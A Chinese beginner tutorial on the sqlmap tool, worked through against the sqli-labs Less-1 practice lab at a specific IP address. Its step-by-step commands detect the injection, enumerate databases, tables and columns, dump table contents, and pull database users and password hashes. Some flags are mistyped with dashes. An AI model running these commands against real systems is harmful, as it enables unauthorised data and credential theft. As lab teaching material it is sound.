SQL注入之sqlmap入門學(xué)習(xí)
原來sql注入如此簡單
以SQL注入靶場(chǎng)sqli-labs第一關(guān)為例,進(jìn)行sqlmap工具的使用分享。
一、判斷是否存在注入點(diǎn)
使用命令:
使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"
有圖中白色背景的 則判斷出有注入點(diǎn)
二、查詢當(dāng)前用戶下所有數(shù)據(jù)庫
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs
可以看到有五個(gè)表
三、獲取數(shù)據(jù)庫中的表名
選取一個(gè)challenges數(shù)據(jù)庫,獲取此庫的表名
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables
四、獲取表中的字段名
選取表T5M0QG6FM2,獲取其中字段名
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns
五、獲取字段內(nèi)容
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump
六、獲取數(shù)據(jù)庫的所有用戶
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users
使用該命令就可以列出所有管理用戶
七、獲取數(shù)據(jù)庫用戶的密碼
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords
八、獲取當(dāng)前網(wǎng)站數(shù)據(jù)庫的名稱
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db
可以看到當(dāng)前的數(shù)據(jù)庫是 security
九、獲取當(dāng)前網(wǎng)站數(shù)據(jù)庫的用戶名稱
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user
當(dāng)前用戶是root
到此這篇關(guān)于SQL注入之sqlmap入門學(xué)習(xí)的文章就介紹到這了,更多相關(guān)sqlmap入門內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
相關(guān)文章
SQL Server中實(shí)現(xiàn)數(shù)據(jù)庫的自定義視圖
在SQL Server的數(shù)據(jù)處理和分析中,視圖(View)是一種虛擬的表,其內(nèi)容由SQL查詢定義,自定義視圖允許用戶根據(jù)需要?jiǎng)?chuàng)建個(gè)性化的數(shù)據(jù)展示,本文將詳細(xì)介紹如何在SQL Server中實(shí)現(xiàn)數(shù)據(jù)庫的自定義視圖,需要的朋友可以參考下2024-07-07SQL開窗函數(shù)的具體實(shí)現(xiàn)詳解
這篇文章主要介紹了SQL開窗函數(shù)的具體實(shí)現(xiàn)詳解,文中通過示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧2020-07-07SQL?Server時(shí)間轉(zhuǎn)換3種方法總結(jié)
SQL?Server中處理日期和時(shí)間的常用方法有三種:FORMAT、CONVERT和DATEADD,這篇文章主要介紹了SQL?Server時(shí)間轉(zhuǎn)換的3種方法,文中通過代碼介紹的非常詳細(xì),需要的朋友可以參考下2024-09-09SQL SERVER 數(shù)據(jù)類型詳解補(bǔ)充2
之前腳本之家發(fā)過數(shù)據(jù)類型方面的文章,但內(nèi)容不是很充實(shí),這里的一篇文章,正好彌補(bǔ)以前的一些,建議這兩篇文章一起看效果更好。2010-04-04SQL建立數(shù)據(jù)庫及刪除數(shù)據(jù)庫命令
SQL建立數(shù)據(jù)庫及刪除數(shù)據(jù)庫命令,需要使用sqlserver的朋友可以參考下。2011-11-11更改SQL Server更改當(dāng)前數(shù)據(jù)庫的所有者:sp_changedbowner
更改SQL Server更改當(dāng)前數(shù)據(jù)庫的所有者:sp_changedbowner...2007-02-02sql多表行轉(zhuǎn)列、級(jí)聯(lián)行轉(zhuǎn)列示例代碼
這篇文章主要介紹了sql多表行轉(zhuǎn)列、級(jí)聯(lián)行轉(zhuǎn)列示例代碼,需要的朋友可以參考下2014-03-03SQL中查找某幾個(gè)字段完全一樣的數(shù)據(jù)
本文分享SQL語句實(shí)現(xiàn)表中字段的組合累加排序的實(shí)例代碼,希望能給大家做一個(gè)參考。2016-06-06